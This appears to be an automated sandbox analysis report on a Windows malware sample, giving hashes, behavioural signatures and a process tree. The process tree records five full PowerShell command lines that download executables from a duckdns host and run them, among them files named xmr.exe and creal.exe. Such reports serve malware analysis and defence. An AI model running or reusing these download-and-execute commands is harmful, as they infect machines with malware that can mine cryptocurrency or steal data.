Analysis
- max time kernel: 120s
- max time network: 123s
- platform: windows7_x64
- resource: win7-20240319-en
- resource tags: arch:x64, arch:x86, image:win7-20240319-en, locale:en-us, os:windows7-x64, system
- submitted: 28/03/2024, 09:24
Static task: static1
Behavioral task: behavioral1
- Sample: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe
- Resource: win7-20240319-en
General
- Target: SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe
- Size: 451KB
- MD5: 6614077c77a8182f0307a720071f2197
- SHA1: 06a06a6d02ad281942ed8b6890f099be54275bb2
- SHA256: 2935daeddeb1f505cea4ad368f598ab029942d91d831b71bbe4de5284c7a3132
- SHA512: 26b1249631b8762d332b04ccac12faf4e52a4641efa90ff0c13596715c5ef8f4eb08c4e6e32efe551ebf3a3a432a897c33eafa9980dd12eeb65213081f3d77cb
- SSDEEP: 12288:QLMEalqxXblqoRX5qbfphLxaO3qX+t4SJ:cqaXNabfphLxa4w4
Malware Config
Signatures
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  pid / Process:
  2512 powershell.exe
  2548 powershell.exe
  2460 powershell.exe
  2464 powershell.exe
  436 powershell.exe
- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  description / pid / Process:
  Token: SeDebugPrivilege 2512 powershell.exe
  Token: SeDebugPrivilege 2548 powershell.exe
  Token: SeDebugPrivilege 2460 powershell.exe
  Token: SeDebugPrivilege 2464 powershell.exe
  Token: SeDebugPrivilege 436 powershell.exe
- Suspicious use of WriteProcessMemory (21 IoCs)
  description / pid / Process / procid_target (each of the following rows is listed three times in the report):
  PID 2184 wrote to memory of 2216 | 2184 SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe | 28
  PID 2216 wrote to memory of 1744 | 2216 WScript.exe | 29
  PID 1744 wrote to memory of 2512 | 1744 cmd.exe | 31
  PID 1744 wrote to memory of 2548 | 1744 cmd.exe | 32
  PID 1744 wrote to memory of 2460 | 1744 cmd.exe | 33
  PID 1744 wrote to memory of 2464 | 1744 cmd.exe | 34
  PID 1744 wrote to memory of 436 | 1744 cmd.exe | 35
Processes (indented by process-tree depth)
- C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe"
  - Suspicious use of WriteProcessMemory
  PID: 2184
  - C:\Windows\System32\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\down.vbs"
    - Suspicious use of WriteProcessMemory
    PID: 2216
    - C:\Windows\System32\cmd.exe
      Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\down.bat" "
      - Suspicious use of WriteProcessMemory
      PID: 1744
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\6.exe'; C:\Users\Admin\AppData\Roaming\6.exe"
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 2512
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/hyar8z46/discord.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\1.exe'; C:\Users\Admin\AppData\Roaming\1.exe"
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 2548
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/gn1jv6sz/xeno.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\2.exe'; C:\Users\Admin\AppData\Roaming\2.exe"
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 2460
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/6nif5f8r/address.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\5.exe'; C:\Users\Admin\AppData\Roaming\5.exe"
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 2464
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/g0nv8z1z/creal.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\4.exe'; C:\Users\Admin\AppData\Roaming\4.exe"
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 436
Network
MITRE ATT&CK Enterprise v15
Downloads
- (no path recorded)
  Filesize: 1KB
  MD5: 48d0fbe997f37f768ab67afa935f4db8
  SHA1: 21bd27b35e0edd6e4a02c5d3e19ba3e1388e36c5
  SHA256: bff2534d8b88513358894215ac244520d70b226e463d3035c4ca39892dacfff7
  SHA512: 286e7190ee8840f54977f78e101087a8d73682b665fee75bdb68d8e3f51ee0b6ace28a69f52953c36951e979bb9b9299d7341d415165141202738bc7b8eb341d
- (no path recorded)
  Filesize: 121B
  MD5: f320a0b986e09c248827af4ee48e23b9
  SHA1: 083fd1f18057e1077d5a88f54e190e95c910918f
  SHA256: ab93c1042a9eca743335a1dc9192e3df891960b00d243278f18c3b8beff0555f
  SHA512: 33150cbb8734eb6f37dec03ca573766d5f0324774bce9f28d259c180f1a26ede32dc11a1d8378473ac32a297e8770456a27b942d860003c0f316fc7ecc58eae3
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: f67c0e8062105197a16d057247185262
  SHA1: cb774ec018dc8c1c06b27e57292424af52edbc21
  SHA256: db9e1abcd3027ca4d32219ab60eb72fd4548eef1e6bdfbfc48c5cc83795b4e1a
  SHA512: e8a7ff3ecf2904d749ce873ccfc8d4a1f31e33ed2a0a426f0dc78501f75d6c8ba3fe45b1716089e3e2baee3bb37dcdf571c5016136ed0d8c9ad8fa23202ebc3a